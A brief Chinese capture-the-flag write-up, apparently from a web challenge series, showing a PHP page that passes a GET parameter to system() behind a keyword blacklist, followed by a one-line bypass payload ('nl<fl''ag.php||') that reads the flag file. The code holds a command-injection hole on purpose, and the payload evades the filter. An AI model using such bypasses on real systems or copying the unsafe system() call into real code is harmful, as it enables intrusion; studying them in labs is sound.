1. 代码审计 

      1. <?php
      2. if(isset($_GET['c'])){
      3. $c=$_GET['c'];
      4. if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c))
      5.   //这里把tac过滤了
      6. {
      7.     system($c." >/dev/null 2>&1");
      8. }
      9. }else{
      10. highlight_file(__FILE__);
      11. }

    2. nl进行替换,同web51 

      ?c=nl<fl''ag.php||